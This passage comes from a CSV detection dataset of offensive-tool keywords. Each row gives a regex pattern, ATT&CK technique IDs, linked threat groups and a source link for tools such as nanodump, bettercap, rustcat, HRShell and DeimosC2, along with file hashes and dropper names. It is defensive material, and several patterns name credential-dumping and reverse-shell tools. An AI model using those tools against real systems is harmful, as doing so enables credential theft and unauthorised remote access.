T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon 
Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/m57/cobaltstrike_bofs","1","0","N/A","N/A","10","10","164","25","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z","63576" "masscan *","masscan\s.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","#linux","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","63577" "memdump *","memdump\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63578" "memex /*.exe*","memex\s\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - 
T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63579" "memhunt *","memhunt\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63580" "nanodump*","nanodump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","63581" "needle_sift *","needle_sift\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","0","N/A","N/A","10","10","32","8","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z","63582" "net.recon *","net\.recon\s.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","63583" "nikto -*","nikto\s\-.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/sullo/nikto","1","0","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","63584" "noclient-3.*","noclient\-3\..{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - 
TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","#linux","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","63585" "onex install *","onex\sinstall\s.{0,1000}","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1105 - T1078 - T1059 - T1087","TA0007 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/rajkumardusad/onex","1","0","N/A","N/A","N/A","","N/A","","","","63586" "pandasec888/taowu-cobalt_strike","pandasec888\/taowu\-cobalt_strike","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","63587" "rcat listen *","rcat\slisten\s.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","63588" "set shellcode *","set\sshellcode\s.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","63589" "sharescan *.txt",".{0,1000}\\sharescan\s.{0,1000}\.txt","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63591" "SigFlip *.exe*","SigFlip\s.{0,20}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","63592" "sudomy -*","sudomy\s\-.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - 
T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","0","#linux","N/A","N/A","10","2139","396","2024-06-27T10:07:42Z","2019-07-26T10:26:34Z","63594" "","C\:\\Windows\\Temp\\[a-zA-Z0-9]{8}.tmp","offensive_tool_keyword","Netexec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#regexonly","https://bsky.app/profile/securityaura.bsky.social/post/3lg7uqko4kk2l","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","63595" "*da3465b18efdf0a562bd5e9a4b32e125748bf28e42ec7df7afc91cfa59942371*",".{0,1000}da3465b18efdf0a562bd5e9a4b32e125748bf28e42ec7df7afc91cfa59942371.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63596" "*a3c6eeb29b62cb5700f821078ecf0f8feab0a13dc57f48c86fbf9be0f87e5808*",".{0,1000}a3c6eeb29b62cb5700f821078ecf0f8feab0a13dc57f48c86fbf9be0f87e5808.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63597" "*725770a6eb8569acccbd5120d56b8daf858c450b82badde78a34b653b255ec54*",".{0,1000}725770a6eb8569acccbd5120d56b8daf858c450b82badde78a34b653b255ec54.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control 
framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63598" "*01408bfa53f638c29a7e61818203a36a8e47f4f91cb7be1f86b47501ac652782*",".{0,1000}01408bfa53f638c29a7e61818203a36a8e47f4f91cb7be1f86b47501ac652782.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63599" "*aeb63c7b5035d4dc7955535e58abf3132aedd4797046c78d85e0efef68543b2e*",".{0,1000}aeb63c7b5035d4dc7955535e58abf3132aedd4797046c78d85e0efef68543b2e.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63600" "*482877b51cb1e6dae1fa15041c66be281024fcef535fe082f4a235e375484af5*",".{0,1000}482877b51cb1e6dae1fa15041c66be281024fcef535fe082f4a235e375484af5.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63601" 
"*7dc51ce8272f0e338dfb894cee39680ad993daa6e85cdf7a2dbabe5af1593bb0*",".{0,1000}7dc51ce8272f0e338dfb894cee39680ad993daa6e85cdf7a2dbabe5af1593bb0.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63602" "*a53985665f19360d259a819f2f85a83dc1deacd0f6fe09528743dcaab8ce32d7*",".{0,1000}a53985665f19360d259a819f2f85a83dc1deacd0f6fe09528743dcaab8ce32d7.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63603" "*98be289d235122f8d2bc72246cc2ff49e6fc5cb37407ec8778318b4c5199f542*",".{0,1000}98be289d235122f8d2bc72246cc2ff49e6fc5cb37407ec8778318b4c5199f542.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63604" "*1cb81420f111140340996ad65207ee94f5178d1171a4190c52f211c7f170a7b7*",".{0,1000}1cb81420f111140340996ad65207ee94f5178d1171a4190c52f211c7f170a7b7.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - 
T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63605" "*67YvxuEhCsTJqmwqxV7p/8eENwYLGCYuYoBCvdKyG/9zLP5u0a5h3txOj_qPl9/fW-LxZp9h6q9V3aA6ffd*",".{0,1000}67YvxuEhCsTJqmwqxV7p\/8eENwYLGCYuYoBCvdKyG\/9zLP5u0a5h3txOj_qPl9\/fW\-LxZp9h6q9V3aA6ffd.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#GoBuildID","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63606" "*9F7tor7mhCiJDysQw_L-/INohvCnRtBSSigrVsCTG/T8Fob1oGNlum0Cxw0arO/trAJsF-_gCbhRcNvV28V*",".{0,1000}9F7tor7mhCiJDysQw_L\-\/INohvCnRtBSSigrVsCTG\/T8Fob1oGNlum0Cxw0arO\/trAJsF\-_gCbhRcNvV28V.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#GoBuildID","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63607" "*9dKrWvAAfLukROzUNYjZ/e9RttunI_EAOjwyngPQP/u91LKeDlvTxx65l9eSDQ/-DdyfNC8_OZHVdpZ-LAq*",".{0,1000}9dKrWvAAfLukROzUNYjZ\/e9RttunI_EAOjwyngPQP\/u91LKeDlvTxx65l9eSDQ\/\-DdyfNC8_OZHVdpZ\-LAq.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#GoBuildID","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63608" 
"*9nRCCXM3KQqphMrdO4A2/DIVi7cW5eTrd1BUlOSlY/BMUbCQ3rs0p9w5Et2c1c/9cUnk20rr8LfGcwcmOn2*",".{0,1000}9nRCCXM3KQqphMrdO4A2\/DIVi7cW5eTrd1BUlOSlY\/BMUbCQ3rs0p9w5Et2c1c\/9cUnk20rr8LfGcwcmOn2.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#GoBuildID","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63609" "*MqmtPXHsIlsw5EWlh_iz/d0MIamyPxY_i5HgyF7A6/SjL--RuTH6yxpvqvQpg0/e76G1GENbxSdd_Ybi8U_*",".{0,1000}MqmtPXHsIlsw5EWlh_iz\/d0MIamyPxY_i5HgyF7A6\/SjL\-\-RuTH6yxpvqvQpg0\/e76G1GENbxSdd_Ybi8U_.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#GoBuildID","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63610" "*T9s0FutG88kZ8BPo9iWA/zah4Ern4bK4lsKZ0pE46/AF1V207LA9Vqs9anuQmf/43O9OIaipkIcVdfnlpkM*",".{0,1000}T9s0FutG88kZ8BPo9iWA\/zah4Ern4bK4lsKZ0pE46\/AF1V207LA9Vqs9anuQmf\/43O9OIaipkIcVdfnlpkM.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#GoBuildID","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63611" "*ftX7dRXD7AzD3o29ogT6/jwn3GDixxrpnrFlY05In/9uvIfvPhpf36fnK3eGJ1/2oRlb6HJjyMWmEoZSP9H*",".{0,1000}ftX7dRXD7AzD3o29ogT6\/jwn3GDixxrpnrFlY05In\/9uvIfvPhpf36fnK3eGJ1\/2oRlb6HJjyMWmEoZSP9H.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 
- T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#GoBuildID","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63612" "*kz9PeumUFPfu15BW5JHP/Vzq-0GhJYD5QsW9eGent/spfAVyHh45zEcYzik0Ys/V7tbqg80MDK92O5TWI1d*",".{0,1000}kz9PeumUFPfu15BW5JHP\/Vzq\-0GhJYD5QsW9eGent\/spfAVyHh45zEcYzik0Ys\/V7tbqg80MDK92O5TWI1d.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#GoBuildID","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63613" "*nfBUs4GIb-lk5T1y3ce0/AeFb8T7rxCJqj5fxLLqU/M98mH-F6Ol7mDiQDgpTX/7Ci4jIkONBi58pXHBBW2*",".{0,1000}nfBUs4GIb\-lk5T1y3ce0\/AeFb8T7rxCJqj5fxLLqU\/M98mH\-F6Ol7mDiQDgpTX\/7Ci4jIkONBi58pXHBBW2.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#GoBuildID","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63614" "*t-YM5mES5i58beFX3Fvw/lIYieezobFTWoUqwZHs7/S0XOterfAiNITgOjhFYV/ynBlbRscD__FetsICudx*",".{0,1000}t\-YM5mES5i58beFX3Fvw\/lIYieezobFTWoUqwZHs7\/S0XOterfAiNITgOjhFYV\/ynBlbRscD__FetsICudx.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#GoBuildID","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63615" 
"*uHXH4r3MVrfP_FEK1O1B/7KutUqnsT1lPUK4qq_ux/HcE545qbkn4rx27pKrdJ/h_-zlV8Ba5MWvRKA2EGM*",".{0,1000}uHXH4r3MVrfP_FEK1O1B\/7KutUqnsT1lPUK4qq_ux\/HcE545qbkn4rx27pKrdJ\/h_\-zlV8Ba5MWvRKA2EGM.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#GoBuildID","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63616" "* install pypykatz*",".{0,1000}\sinstall\spypykatz.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63617" "* lsassparse.py*",".{0,1000}\slsassparse\.py.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63618" "* ondisk_dropper_tcp.ps1*",".{0,1000}\sondisk_dropper_tcp\.ps1.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63619" "* ondisk_dropper_tcp.py*",".{0,1000}\sondisk_dropper_tcp\.py.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for 
post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63620" "* ondisk_dropper_tcp.sh*",".{0,1000}\sondisk_dropper_tcp\.sh.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#linux","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63621" "*/agents/bin/minidump.exe*",".{0,1000}\/agents\/bin\/minidump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63622" "*/bin/ntdsdump.elf*",".{0,1000}\/bin\/ntdsdump\.elf.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - 